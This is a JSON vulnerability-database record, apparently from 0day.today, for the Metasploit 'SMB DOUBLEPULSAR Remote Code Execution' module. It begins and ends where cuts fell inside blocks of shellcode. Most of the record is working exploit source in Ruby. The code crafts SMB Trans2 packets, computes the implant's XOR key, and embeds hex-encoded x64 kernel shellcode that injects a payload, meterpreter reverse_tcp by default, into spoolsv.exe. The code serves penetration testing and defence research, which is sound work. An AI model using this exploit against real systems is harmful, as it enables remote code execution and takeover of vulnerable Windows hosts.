\"\\x00\\x00\\x48\\x89\\xc6\\xe8\\x50\\x01\\x00\\x00\\x41\\x81\\xf9\" +\r\n generate_process_hash(proc_name.upcase) +\r\n \"\\x75\\xbc\\x49\\x8b\\x1e\\x4d\\x8d\\x6e\\x10\\x4c\\x89\\xea\\x48\\x89\\xd9\" \\\r\n \"\\x41\\xbb\\xe5\\x24\\x11\\xdc\\xe8\\x81\\x01\\x00\\x00\\x6a\\x40\\x68\\x00\\x10\" \\\r\n \"\\x00\\x00\\x4d\\x8d\\x4e\\x08\\x49\\xc7\\x01\\x00\\x10\\x00\\x00\\x4d\\x31\\xc0\" \\\r\n \"\\x4c\\x89\\xf2\\x31\\xc9\\x48\\x89\\x0a\\x48\\xf7\\xd1\\x41\\xbb\\x4b\\xca\\x0a\" \\\r\n \"\\xee\\x48\\x83\\xec\\x20\\xe8\\x52\\x01\\x00\\x00\\x85\\xc0\\x0f\\x85\\xc8\\x00\" \\\r\n \"\\x00\\x00\\x49\\x8b\\x3e\\x48\\x8d\\x35\\xe9\\x00\\x00\\x00\\x31\\xc9\\x66\\x03\" \\\r\n \"\\x0d\\xd7\\x01\\x00\\x00\\x66\\x81\\xc1\\xf9\\x00\\xf3\\xa4\\x48\\x89\\xde\\x48\" \\\r\n \"\\x81\\xc6\\x08\\x03\\x00\\x00\\x48\\x89\\xf1\\x48\\x8b\\x11\\x4c\\x29\\xe2\\x51\" \\\r\n \"\\x52\\x48\\x89\\xd1\\x48\\x83\\xec\\x20\\x41\\xbb\\x26\\x40\\x36\\x9d\\xe8\\x09\" \\\r\n \"\\x01\\x00\\x00\\x48\\x83\\xc4\\x20\\x5a\\x59\\x48\\x85\\xc0\\x74\\x18\\x48\\x8b\" \\\r\n \"\\x80\\xc8\\x02\\x00\\x00\\x48\\x85\\xc0\\x74\\x0c\\x48\\x83\\xc2\\x4c\\x8b\\x02\" \\\r\n \"\\x0f\\xba\\xe0\\x05\\x72\\x05\\x48\\x8b\\x09\\xeb\\xbe\\x48\\x83\\xea\\x4c\\x49\" \\\r\n \"\\x89\\xd4\\x31\\xd2\\x80\\xc2\\x90\\x31\\xc9\\x41\\xbb\\x26\\xac\\x50\\x91\\xe8\" \\\r\n \"\\xc8\\x00\\x00\\x00\\x48\\x89\\xc1\\x4c\\x8d\\x89\\x80\\x00\\x00\\x00\\x41\\xc6\" \\\r\n \"\\x01\\xc3\\x4c\\x89\\xe2\\x49\\x89\\xc4\\x4d\\x31\\xc0\\x41\\x50\\x6a\\x01\\x49\" \\\r\n \"\\x8b\\x06\\x50\\x41\\x50\\x48\\x83\\xec\\x20\\x41\\xbb\\xac\\xce\\x55\\x4b\\xe8\" \\\r\n \"\\x98\\x00\\x00\\x00\\x31\\xd2\\x52\\x52\\x41\\x58\\x41\\x59\\x4c\\x89\\xe1\\x41\" \\\r\n \"\\xbb\\x18\\x38\\x09\\x9e\\xe8\\x82\\x00\\x00\\x00\\x4c\\x89\\xe9\\x41\\xbb\\x22\" \\\r\n \"\\xb7\\xb3\\x7d\\xe8\\x74\\x00\\x00\\x00\\x48\\x89\\xd9\\x41\\xbb\\x0d\\xe2\\x4d\" \\\r\n \"\\x85\\xe8\\x66\\x00\\x00\\x00\\x48\\x89\\xec\\x5d\\x5b\\x41\\x5c\\x41\\x5d\\x41\" \\\r\n \"\\x5e\\x41\\x5f\\x5e\\xc3\\xe9\\xb5\\x00\\x00\\x00\\x4d\\x31\\xc9\\x31\\xc0\\xac\" \\\r\n \"\\x41\\xc1\\xc9\\x0d\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\x01\\xc1\\x38\\xe0\\x75\" \\\r\n \"\\xec\\xc3\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\\x8b\\x52\\x18\\x48\\x8b\\x52\" \\\r\n \"\\x20\\x48\\x8b\\x12\\x48\\x8b\\x72\\x50\\x48\\x0f\\xb7\\x4a\\x4a\\x45\\x31\\xc9\" \\\r\n \"\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\" \\\r\n \"\\xe2\\xee\\x45\\x39\\xd9\\x75\\xda\\x4c\\x8b\\x7a\\x20\\xc3\\x4c\\x89\\xf8\\x41\" \\\r\n \"\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x89\\xc2\\x8b\\x42\\x3c\\x48\\x01\\xd0\\x8b\" \\\r\n \"\\x80\\x88\\x00\\x00\\x00\\x48\\x01\\xd0\\x50\\x8b\\x48\\x18\\x44\\x8b\\x40\\x20\" \\\r\n \"\\x49\\x01\\xd0\\x48\\xff\\xc9\\x41\\x8b\\x34\\x88\\x48\\x01\\xd6\\xe8\\x78\\xff\" \\\r\n \"\\xff\\xff\\x45\\x39\\xd9\\x75\\xec\\x58\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\" \\\r\n \"\\x41\\x8b\\x0c\\x48\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x41\\x8b\\x04\\x88\\x48\" \\\r\n \"\\x01\\xd0\\x5e\\x59\\x5a\\x41\\x58\\x41\\x59\\x41\\x5b\\x41\\x53\\xff\\xe0\\x56\" \\\r\n \"\\x41\\x57\\x55\\x48\\x89\\xe5\\x48\\x83\\xec\\x20\\x41\\xbb\\xda\\x16\\xaf\\x92\" \\\r\n \"\\xe8\\x4d\\xff\\xff\\xff\\x31\\xc9\\x51\\x51\\x51\\x51\\x41\\x59\\x4c\\x8d\\x05\" \\\r\n \"\\x1a\\x00\\x00\\x00\\x5a\\x48\\x83\\xec\\x20\\x41\\xbb\\x46\\x45\\x1b\\x22\\xe8\" \\\r\n \"\\x68\\xff\\xff\\xff\\x48\\x89\\xec\\x5d\\x41\\x5f\\x5e\\xc3\"\r\n end\r\n\r\n def kernel_shellcode_size\r\n make_kernel_shellcode('').length\r\n end\r\n\r\nend\n\n# 0day.today [2021-10-06] #"}, "lastseen": "2021-10-06T00:18:57", "differentElements": ["sourceData"], "edition": 35}, {"bulletin": {"id": "1337DAY-ID-33895", "vendorId": null, "hash": "95e6cb21b7dce6e0be47676b29636483", "type": "zdt", "bulletinFamily": "exploit", "title": "SMB DOUBLEPULSAR Remote Code Execution Exploit", "description": "This Metasploit module executes a Metasploit payload against the Equation Group's DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE. While this module primarily performs code execution against the implant, the \"Neutralize implant\" target allows you to disable the implant.", "published": "2020-02-04T00:00:00", "modified": "2020-02-04T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/33895", "reporter": "zdt", "references": [], "cvelist": ["CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0145"], "immutableFields": [], "lastseen": "2021-10-06T22:17:02", "history": [], "viewCount": 111, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:146236", "PACKETSTORM:156196", "PACKETSTORM:142548", "PACKETSTORM:142181", "PACKETSTORM:154690"]}, {"type": "zdt", "idList": ["1337DAY-ID-29702", "1337DAY-ID-33313", "1337DAY-ID-27802", "1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-27613"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D"]}, {"type": "nessus", "idList": ["700099.PRM", "SMB_NT_MS17-010.NASL", "MS17-010.NASL", "700059.PRM"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:41987", "EDB-ID:42030", "EDB-ID:47456", "EDB-ID:43970"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676", "OPENVAS:1361412562310810698"]}, {"type": "mskb", "idList": ["KB4013389", "KB4012598"]}, {"type": "seebug", "idList": ["SSV:92952", "SSV:92964"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0147", "CVE-2017-0148", "CVE-2017-0144", "CVE-2017-0145"]}, {"type": "symantec", "idList": ["SMNTC-96703", "SMNTC-96704", "SMNTC-96706", "SMNTC-96707", "SMNTC-96705", "SMNTC-96709"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A"]}, {"type": "threatpost", "idList": ["THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D"]}, {"type": "mmpc", "idList": ["MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:FECB9309EE6D84976C56C12C05F1CD02"]}, {"type": "canvas", "idList": ["ETERNALBLUE", "MS17_010"]}, {"type": "thn", "idList": ["THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8", "QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0148", "MS:CVE-2017-0143", "MS:CVE-2017-0145"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:64F70C2A6C3961CA44A77286E5B810CD", "SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:9EF85E0CE1D118D27911357B1C516074"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}], "modified": "2021-10-06T00:18:57", "rev": 2}, "score": {"value": 7.8, "vector": "NONE", "modified": "2021-10-06T00:18:57", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/33895", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n\r\n Rank = GreatRanking\r\n\r\n include Msf::Exploit::Remote::SMB::Client\r\n include Msf::Module::Deprecated\r\n\r\n moved_from 'exploit/windows/smb/doublepulsar_rce'\r\n\r\n MAX_SHELLCODE_SIZE = 4096\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'SMB DOUBLEPULSAR Remote Code Execution',\r\n 'Description' => %q{\r\n This module executes a Metasploit payload against the Equation Group's\r\n DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE.\r\n\r\n While this module primarily performs code execution against the implant,\r\n the \"Neutralize implant\" target allows you to disable the implant.\r\n },\r\n 'Author' => [\r\n 'Equation Group', # DOUBLEPULSAR implant\r\n 'Shadow Brokers', # Equation Group dump\r\n 'zerosum0x0', # DOPU analysis and detection\r\n 'Luke Jennings', # DOPU analysis and detection\r\n 'wvu', # Metasploit module and arch detection\r\n 'Jacob Robles' # Metasploit module and RCE help\r\n ],\r\n 'References' => [\r\n ['MSB', 'MS17-010'],\r\n ['CVE', '2017-0143'],\r\n ['CVE', '2017-0144'],\r\n ['CVE', '2017-0145'],\r\n ['CVE', '2017-0146'],\r\n ['CVE', '2017-0147'],\r\n ['CVE', '2017-0148'],\r\n ['URL', 'https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html'],\r\n ['URL', 'https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/'],\r\n ['URL', 'https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-detection-script'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-c2-traffic-decryptor'],\r\n ['URL', 'https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1']\r\n ],\r\n 'DisclosureDate' => '2017-04-14', # Shadow Brokers leak\r\n 'License' => MSF_LICENSE,\r\n 'Platform' => 'win',\r\n 'Arch' => ARCH_X64,\r\n 'Privileged' => true,\r\n 'Payload' => {\r\n 'Space' => MAX_SHELLCODE_SIZE - kernel_shellcode_size,\r\n 'DisableNops' => true\r\n },\r\n 'Targets' => [\r\n ['Execute payload (x64)',\r\n 'DefaultOptions' => {\r\n 'EXITFUNC' => 'thread',\r\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\r\n }\r\n ],\r\n ['Neutralize implant',\r\n 'DefaultOptions' => {\r\n 'PAYLOAD' => nil # XXX: \"Unset\" generic payload\r\n }\r\n ]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'Notes' => {\r\n 'AKA' => ['DOUBLEPULSAR'],\r\n 'RelatedModules' => [\r\n 'auxiliary/scanner/smb/smb_ms17_010',\r\n 'exploit/windows/smb/ms17_010_eternalblue'\r\n ],\r\n 'Stability' => [CRASH_OS_DOWN],\r\n 'Reliability' => [REPEATABLE_SESSION]\r\n }\r\n ))\r\n\r\n register_advanced_options([\r\n OptBool.new('DefangedMode', [true, 'Run in defanged mode', true]),\r\n OptString.new('ProcessName', [true, 'Process to inject payload into', 'spoolsv.exe'])\r\n ])\r\n end\r\n\r\n OPCODES = {\r\n ping: 0x23,\r\n exec: 0xc8,\r\n kill: 0x77\r\n }.freeze\r\n\r\n STATUS_CODES = {\r\n not_detected: 0x00,\r\n success: 0x10,\r\n invalid_params: 0x20,\r\n alloc_failure: 0x30\r\n }.freeze\r\n\r\n def calculate_doublepulsar_status(m1, m2)\r\n STATUS_CODES.key(m2.to_i - m1.to_i)\r\n end\r\n\r\n # algorithm to calculate the XOR Key for DoublePulsar knocks\r\n def calculate_doublepulsar_xor_key(s)\r\n x = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8)))\r\n x & 0xffffffff # this line was added just to truncate to 32 bits\r\n end\r\n\r\n # The arch is adjacent to the XOR key in the SMB signature\r\n def calculate_doublepulsar_arch(s)\r\n s == 0 ? ARCH_X86 : ARCH_X64\r\n end\r\n\r\n def generate_doublepulsar_timeout(op)\r\n k = SecureRandom.random_bytes(4).unpack1('V')\r\n 0xff & (op - ((k & 0xffff00) >> 16) - (0xffff & (k & 0xff00) >> 8)) | k & 0xffff00\r\n end\r\n\r\n def generate_doublepulsar_param(op, body)\r\n case OPCODES.key(op)\r\n when :ping, :kill\r\n \"\\x00\" * 12\r\n when :exec\r\n Rex::Text.xor([@xor_key].pack('V'), [body.length, body.length, 0].pack('V*'))\r\n end\r\n end\r\n\r\n def check\r\n ipc_share = \"\\\\\\\\#{rhost}\\\\IPC$\"\r\n\r\n @tree_id = do_smb_setup_tree(ipc_share)\r\n vprint_good(\"Connected to #{ipc_share} with TID = #{@tree_id}\")\r\n vprint_status(\"Target OS is #{smb_peer_os}\")\r\n\r\n print_status('Sending ping to DOUBLEPULSAR')\r\n code, signature1, signature2 = do_smb_doublepulsar_pkt\r\n msg = 'Host is likely INFECTED with DoublePulsar!'\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n @xor_key = calculate_doublepulsar_xor_key(signature1)\r\n @arch = calculate_doublepulsar_arch(signature2)\r\n\r\n arch_str =\r\n case @arch\r\n when ARCH_X86\r\n 'x86 (32-bit)'\r\n when ARCH_X64\r\n 'x64 (64-bit)'\r\n end\r\n\r\n print_warning(\"#{msg} - Arch: #{arch_str}, XOR Key: 0x#{@xor_key.to_s(16).upcase}\")\r\n CheckCode::Vulnerable\r\n when :not_detected\r\n print_error('DOUBLEPULSAR not detected or disabled')\r\n CheckCode::Safe\r\n else\r\n print_error('An unknown error occurred')\r\n CheckCode::Unknown\r\n end\r\n end\r\n\r\n def exploit\r\n if datastore['DefangedMode']\r\n warning = <<~EOF\r\n\r\n\r\n Are you SURE you want to execute code against a nation-state implant?\r\n You MAY contaminate forensic evidence if there is an investigation.\r\n\r\n Disable the DefangedMode option if you have authorization to proceed.\r\n EOF\r\n\r\n fail_with(Failure::BadConfig, warning)\r\n end\r\n\r\n # No ForceExploit because @tree_id and @xor_key are required\r\n unless check == CheckCode::Vulnerable\r\n fail_with(Failure::NotVulnerable, 'Unable to proceed without DOUBLEPULSAR')\r\n end\r\n\r\n case target.name\r\n when 'Execute payload (x64)'\r\n unless @xor_key\r\n fail_with(Failure::NotFound, 'XOR key not found')\r\n end\r\n\r\n if @arch == ARCH_X86\r\n fail_with(Failure::NoTarget, 'x86 is not a supported target')\r\n end\r\n\r\n print_status(\"Generating kernel shellcode with #{datastore['PAYLOAD']}\")\r\n shellcode = make_kernel_user_payload(payload.encoded, datastore['ProcessName'])\r\n shellcode << rand_text(MAX_SHELLCODE_SIZE - shellcode.length)\r\n vprint_status(\"Total shellcode length: #{shellcode.length} bytes\")\r\n\r\n print_status(\"Encrypting shellcode with XOR key 0x#{@xor_key.to_s(16).upcase}\")\r\n xor_shellcode = Rex::Text.xor([@xor_key].pack('V'), shellcode)\r\n\r\n print_status('Sending shellcode to DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:exec], xor_shellcode)\r\n when 'Neutralize implant'\r\n return neutralize_implant\r\n end\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Payload execution successful')\r\n when :invalid_params\r\n fail_with(Failure::BadConfig, 'Invalid parameters were specified')\r\n when :alloc_failure\r\n fail_with(Failure::PayloadFailed, 'An allocation failure occurred')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n ensure\r\n disconnect\r\n end\r\n\r\n def neutralize_implant\r\n print_status('Neutralizing DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:kill])\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Implant neutralization successful')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n end\r\n\r\n def do_smb_setup_tree(ipc_share)\r\n connect\r\n\r\n # logon as user \\\r\n simple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain'])\r\n\r\n # connect to IPC$\r\n simple.connect(ipc_share)\r\n\r\n # return tree\r\n simple.shares[ipc_share]\r\n end\r\n\r\n def do_smb_doublepulsar_pkt(opcode = OPCODES[:ping], body = nil)\r\n # make doublepulsar knock\r\n pkt = make_smb_trans2_doublepulsar(opcode, body)\r\n\r\n sock.put(pkt)\r\n bytes = sock.get_once\r\n\r\n return unless bytes\r\n\r\n # convert packet to response struct\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct\r\n pkt.from_s(bytes[4..-1])\r\n\r\n return pkt['SMB'].v['MultiplexID'], pkt['SMB'].v['Signature1'], pkt['SMB'].v['Signature2']\r\n end\r\n\r\n def make_smb_trans2_doublepulsar(opcode, body)\r\n setup_count = 1\r\n setup_data = [0x000e].pack('v')\r\n\r\n param = generate_doublepulsar_param(opcode, body)\r\n data = param + body.to_s\r\n\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS2_PKT.make_struct\r\n simple.client.smb_defaults(pkt['Payload']['SMB'])\r\n\r\n base_offset = pkt.to_s.length + (setup_count * 2) - 4\r\n param_offset = base_offset\r\n data_offset = param_offset + param.length\r\n\r\n pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2\r\n pkt['Payload']['SMB'].v['Flags1'] = 0x18\r\n pkt['Payload']['SMB'].v['Flags2'] = 0xc007\r\n\r\n @multiplex_id = rand(0xffff)\r\n\r\n pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count\r\n pkt['Payload']['SMB'].v['TreeID'] = @tree_id\r\n pkt['Payload']['SMB'].v['MultiplexID'] = @multiplex_id\r\n\r\n pkt['Payload'].v['ParamCountTotal'] = param.length\r\n pkt['Payload'].v['DataCountTotal'] = body.to_s.length\r\n pkt['Payload'].v['ParamCountMax'] = 1\r\n pkt['Payload'].v['DataCountMax'] = 0\r\n pkt['Payload'].v['ParamCount'] = param.length\r\n pkt['Payload'].v['ParamOffset'] = param_offset\r\n pkt['Payload'].v['DataCount'] = body.to_s.length\r\n pkt['Payload'].v['DataOffset'] = data_offset\r\n pkt['Payload'].v['SetupCount'] = setup_count\r\n pkt['Payload'].v['SetupData'] = setup_data\r\n pkt['Payload'].v['Timeout'] = generate_doublepulsar_timeout(opcode)\r\n pkt['Payload'].v['Payload'] = data\r\n\r\n pkt.to_s\r\n end\r\n\r\n # ring3 = user mode encoded payload\r\n # proc_name = process to inject APC into\r\n def make_kernel_user_payload(ring3, proc_name)\r\n sc = make_kernel_shellcode(proc_name)\r\n\r\n sc << [ring3.length].pack('S<')\r\n sc << ring3\r\n\r\n sc\r\n end\r\n\r\n def generate_process_hash(process)\r\n # x64_calc_hash from external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n proc_hash = 0\r\n process << \"\\x00\"\r\n\r\n process.each_byte do |c|\r\n proc_hash = ror(proc_hash, 13)\r\n proc_hash += c\r\n end\r\n\r\n [proc_hash].pack('l<')\r\n end\r\n\r\n def ror(dword, bits)\r\n (dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF\r\n end\r\n\r\n def make_kernel_shellcode(proc_name)\r\n # see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n # Length: 780 bytes\r\n \"\\x31\\xc9\\x41\\xe2\\x01\\xc3\\x56\\x41\\x57\\x41\\x56\\x41\\x55\\x41\\x54\\x53\" \\\r\n \"\\x55\\x48\\x89\\xe5\\x66\\x83\\xe4\\xf0\\x48\\x83\\xec\\x20\\x4c\\x8d\\x35\\xe3\" \\\r\n \"\\xff\\xff\\xff\\x65\\x4c\\x8b\\x3c\\x25\\x38\\x00\\x00\\x00\\x4d\\x8b\\x7f\\x04\" \\\r\n \"\\x49\\xc1\\xef\\x0c\\x49\\xc1\\xe7\\x0c\\x49\\x81\\xef\\x00\\x10\\x00\\x00\\x49\" \\\r\n \"\\x8b\\x37\\x66\\x81\\xfe\\x4d\\x5a\\x75\\xef\\x41\\xbb\\x5c\\x72\\x11\\x62\\xe8\" \\\r\n \"\\x18\\x02\\x00\\x00\\x48\\x89\\xc6\\x48\\x81\\xc6\\x08\\x03\\x00\\x00\\x41\\xbb\" \\\r\n \"\\x7a\\xba\\xa3\\x30\\xe8\\x03\\x02\\x00\\x00\\x48\\x89\\xf1\\x48\\x39\\xf0\\x77\" \\\r\n \"\\x11\\x48\\x8d\\x90\\x00\\x05\\x00\\x00\\x48\\x39\\xf2\\x72\\x05\\x48\\x29\\xc6\" \\\r\n \"\\xeb\\x08\\x48\\x8b\\x36\\x48\\x39\\xce\\x75\\xe2\\x49\\x89\\xf4\\x31\\xdb\\x89\" \\\r\n \"\\xd9\\x83\\xc1\\x04\\x81\\xf9\\x00\\x00\\x01\\x00\\x0f\\x8d\\x66\\x01\\x00\\x00\" \\\r\n \"\\x4c\\x89\\xf2\\x89\\xcb\\x41\\xbb\\x66\\x55\\xa2\\x4b\\xe8\\xbc\\x01\\x00\\x00\" \\\r\n \"\\x85\\xc0\\x75\\xdb\\x49\\x8b\\x0e\\x41\\xbb\\xa3\\x6f\\x72\\x2d\\xe8\\xaa\\x01\" \\\r\n \"\\x00\\x00\\x48\\x89\\xc6\\xe8\\x50\\x01\\x00\\x00\\x41\\x81\\xf9\" +\r\n generate_process_hash(proc_name.upcase) +\r\n \"\\x75\\xbc\\x49\\x8b\\x1e\\x4d\\x8d\\x6e\\x10\\x4c\\x89\\xea\\x48\\x89\\xd9\" \\\r\n \"\\x41\\xbb\\xe5\\x24\\x11\\xdc\\xe8\\x81\\x01\\x00\\x00\\x6a\\x40\\x68\\x00\\x10\" \\\r\n \"\\x00\\x00\\x4d\\x8d\\x4e\\x08\\x49\\xc7\\x01\\x00\\x10\\x00\\x00\\x4d\\x31\\xc0\" \\\r\n \"\\x4c\\x89\\xf2\\x31\\xc9\\x48\\x89\\x0a\\x48\\xf7\\xd1\\x41\\xbb\\x4b\\xca\\x0a\" \\\r\n \"\\xee\\x48\\x83\\xec\\x20\\xe8\\x52\\x01\\x00\\x00\\x85\\xc0\\x0f\\x85\\xc8\\x00\" \\\r\n \"\\x00\\x00\\x49\\x8b\\x3e\\x48\\x8d\\x35\\xe9\\x00\\x00\\x00\\x31\\xc9\\x66\\x03\" \\\r\n \"\\x0d\\xd7\\x01\\x00\\x00\\x66\\x81\\xc1\\xf9\\x00\\xf3\\xa4\\x48\\x89\\xde\\x48\" \\\r\n \"\\x81\\xc6\\x08\\x03\\x00\\x00\\x48\\x89\\xf1\\x48\\x8b\\x11\\x4c\\x29\\xe2\\x51\" \\\r\n \"\\x52\\x48\\x89\\xd1\\x48\\x83\\xec\\x20\\x41\\xbb\\x26\\x40\\x36\\x9d\\xe8\\x09\" \\\r\n \"\\x01\\x00\\x00\\x48\\x83\\xc4\\x20\\x5a\\x59\\x48\\x85\\xc0\\x74\\x18\\x48\\x8b\" \\\r\n \"\\x80\\xc8\\x02\\x00\\x00\\x48\\x85\\xc0\\x74\\x0c\\x48\\x83\\xc2\\x4c\\x8b\\x02\" \\\r\n \"\\x0f\\xba\\xe0\\x05\\x72\\x05\\x48\\x8b\\x09\\xeb\\xbe\\x48\\x83\\xea\\x4c\\x49\" \\\r\n \"\\x89\\xd4\\x31\\xd2\\x80\\xc2\\x90\\x31\\xc9\\x41\\xbb\\x26\\xac\\x50\\x91\\xe8\" \\\r\n \"\\xc8\\x00\\x00\\x00\\x48\\x89\\xc1\\x4c\\x8d\\x89\\x80\\x00\\x00\\x00\\x41\\xc6\" \\\r\n \"\\x01\\xc3\\x4c\\x89\\xe2\\x49\\x89\\xc4\\x4d\\x31\\xc0\\x41\\x50\\x6a\\x01\\x49\" \\\r\n \"\\x8b\\x06\\x50\\x41\\x50\\x48\\x83\\xec\\x20\\x41\\xbb\\xac\\xce\\x55\\x4b\\xe8\" \\\r\n 